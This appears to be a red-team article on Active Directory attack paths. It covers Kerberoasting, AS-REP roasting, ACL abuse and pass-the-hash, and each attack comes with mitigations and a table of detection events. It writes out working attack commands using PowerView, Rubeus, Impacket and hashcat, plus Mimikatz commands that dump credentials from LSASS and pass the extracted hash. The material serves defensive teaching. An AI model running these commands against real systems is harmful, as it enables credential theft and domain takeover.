In the vast majority of our red team engagements against enterprise environments, the path from an initial foothold to full domain compromise runs through Active Directory. This is not because AD is uniquely insecure. It is because AD manages authentication and authorisation for the entire Windows environment, and most environments have accumulated years of misconfigurations, excessive delegations, and legacy settings that create reliable attack paths for an attacker who knows where to look.
Getting the Initial Foothold
Lateral movement in AD typically starts after an attacker has compromised a low-privileged user account or obtained code execution on a workstation. Common routes to the initial foothold include phishing (the most reliable), password spraying against externally exposed services, exploitation of unpatched vulnerabilities on internet-facing infrastructure, and compromise of a trusted vendor or contractor account.
Kerberoasting
Any authenticated domain user can request a Kerberos service ticket for any service principal name (SPN) registered in Active Directory. Service tickets are encrypted with the NTLM hash of the service account's password. An attacker can extract the ticket and attempt to crack it offline, with no network noise and no account lockout.
# Enumerate Kerberoastable accounts (low-privilege user required)
# Using PowerView
Get-DomainUser -SPN | Select-Object SamAccountName, ServicePrincipalName, PasswordLastSet
# Request service tickets for offline cracking
# Using Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt /domain:corp.local
# Crack with Hashcat (mode 13100 = Kerberos TGS-REP etype 23)
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.ruleMitigation: Ensure all service accounts use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs) with automatically rotated 120-character passwords. These are computationally infeasible to crack. For legacy SPNs that cannot be migrated, enforce AES-only encryption — RC4 tickets are far faster to crack.
AS-REP Roasting
Accounts that have the 'Do not require Kerberos preauthentication' flag set will respond to an AS-REQ with an encrypted blob that can be cracked offline — without any credentials required from the attacker. This setting is sometimes enabled for legacy application compatibility.
# Find accounts without Kerberos preauthentication (no creds needed)
# Using Impacket from Linux
python3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 10.0.0.1
# Crack with Hashcat (mode 18200 = Kerberos AS-REP etype 23)
hashcat -m 18200 asrep_hashes.txt wordlist.txtACL Abuse and Delegation Chains
Active Directory access control lists can grant one object significant power over another: GenericAll, GenericWrite, WriteOwner, WriteDACL. These permissions accumulate over time as administrators grant temporary access and forget to remove it. BloodHound maps these relationships into attack paths, often revealing that a low-privilege user has a three-hop chain to Domain Admin through a series of delegations that nobody intended.
Pass-the-Hash and Pass-the-Ticket
NTLM authentication accepts a hash in place of a plaintext password. If an attacker extracts an NTLM hash from memory (using tools like Mimikatz against LSASS), they can authenticate as that user to any service that accepts NTLM without ever knowing the plaintext password. Kerberos tickets extracted from memory can similarly be injected into new sessions.
# Extract credentials from LSASS (requires local admin or SYSTEM)
# Using Mimikatz - for authorised testing only
privilege::debug
sekurlsa::logonpasswords
# Pass-the-Hash with extracted NTLM hash
sekurlsa::pth /user:administrator /domain:corp.local /ntlm:aad3b435b51404eeaad3b435b51404ee /run:cmd.exeKey Defensive Controls
| Attack | Primary Mitigation | Detection Signal |
|---|---|---|
| Kerberoasting | gMSA for all service accounts | 4769 events with RC4 encryption type |
| AS-REP Roasting | Require preauthentication on all accounts | 4768 events for DONT_REQ_PREAUTH accounts |
| Pass-the-Hash | Enable Credential Guard, disable NTLM where possible | 4624 logon type 3 with NTLM authentication |
| ACL Abuse | Regular ACL audits with BloodHound | 4662 events on sensitive objects |
| DCSync | Restrict Replication Directory Changes permissions | 4662 with Replicating Directory Changes rights |
Active Directory hardening is not a one-time exercise. Attack paths are created continuously as permissions are granted, systems are added, and configurations drift. Running BloodHound against your own environment quarterly and acting on the high-severity paths it surfaces is the single highest-impact operational security practice for most enterprise environments.